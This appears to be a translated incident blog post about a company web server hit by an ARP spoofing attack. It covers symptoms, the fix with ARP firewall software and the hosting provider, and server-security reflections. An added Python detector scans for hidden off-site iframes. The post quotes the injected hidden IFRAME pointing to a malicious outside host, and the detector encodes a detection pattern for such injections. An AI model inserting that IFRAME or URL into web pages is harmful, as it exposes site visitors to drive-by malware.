1. Attack Phenomenon
At around 19:00 on May 16, on my way home from work, I got a message that access to the company's website was abnormal. The symptoms were as follows:
A) In IE7, opening any HTML page of the website turned into a file download, and the website could not be opened normally.
B) With HTTP 1.1 disabled in IE7, the website could be opened, but 1 IFRAME was embedded at the head of the page source.
IFRAME content: <IFRAME src=http://xindizhi88.com/10.htm width=20 height=0 frameborder=0></iframe>
Searching Google and Baidu showed that the server had been hit by an ARP attack:
http://www.google.cn/search?sourceid=navclient&hl=zh-CN&ie=UTF-8&rlz=1t4gglj_zh-cn248cn249&q=%22xindizhi88%2Ecom%22
http://www.baidu.com?wd=%22xindizhi88%2Ecom%22&cl=3
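A check for symptom B above, as an added example that is not part of the original post: it scans the HTML a client received for iframes that are both off-site and effectively invisible, like the one quoted. The function name, the allowed-host set and the sample page are constructed for illustration (www.example.com stands in for the company site).

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

def _px(value):
    """Return a plain pixel size as int, or None if absent or not numeric (e.g. '100%')."""
    value = (value or "").strip().lower()
    if value.endswith("px"):
        value = value[:-2]
    return int(value) if value.isdigit() else None

class IframeFinder(HTMLParser):
    """Collects iframes that point off-site and are sized or styled to be invisible."""
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":          # html.parser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "").strip()
        host = (urlparse(src).hostname or "").lower()   # empty for relative URLs
        offsite = bool(host) and host not in self.allowed
        w, h = _px(a.get("width")), _px(a.get("height"))
        style = a.get("style", "").replace(" ", "").lower()
        hidden = ((w is not None and w <= 1) or (h is not None and h <= 1)
                  or "display:none" in style or "visibility:hidden" in style)
        if offsite and hidden:
            self.findings.append({"src": src, "host": host, "width": w,
                                  "height": h, "line": self.getpos()[0]})

def find_hidden_offsite_iframes(html, allowed_hosts):
    finder = IframeFinder(allowed_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample: the IFRAME quoted in the post placed ahead of an otherwise normal page.
SAMPLE = """<IFRAME src=http://xindizhi88.com/10.htm width=20 height=0 frameborder=0></iframe>
<html><body>
<iframe src="/banner.htm" width="0" height="0"></iframe>
<iframe src="http://maps.example.net/embed" width="400" height="300"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in find_hidden_offsite_iframes(SAMPLE, {"www.example.com"}):
        print("suspicious iframe on line %(line)d: %(src)s (%(width)sx%(height)s)" % f)
```

Run it on the page as fetched over the network, which is where the post observed the injected IFRAME.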
2. Attack Solution
A) Install ARP firewall software
Here I used 360 Security Guard and 360 ARP Firewall. The effect was good, and access returned to normal. By this time it was 19:50; the whole thing took 50 minutes. We also found the ARP attack source.
B) Find and eliminate the ARP attack source
Because this is a hosted server, I sent the information I had found to the technical staff of the hosting equipment room. At 21:00 I received a notification from the IDC that the ARP attack source had been dealt with. The server was now actually back to normal.
3. References
A) One line of code as a temporary fix for IFRAME trojans: http://www.foloda.com.cn/BLOG/article.asp?id=70
4. Reflections After Being Hit by an ARP Attack
A) What kind of security software should be installed on a typical server?
I. Anti-virus software
II. DDoS defense software
III. ARP attack defense software
IV. And...
You are welcome to add more comments.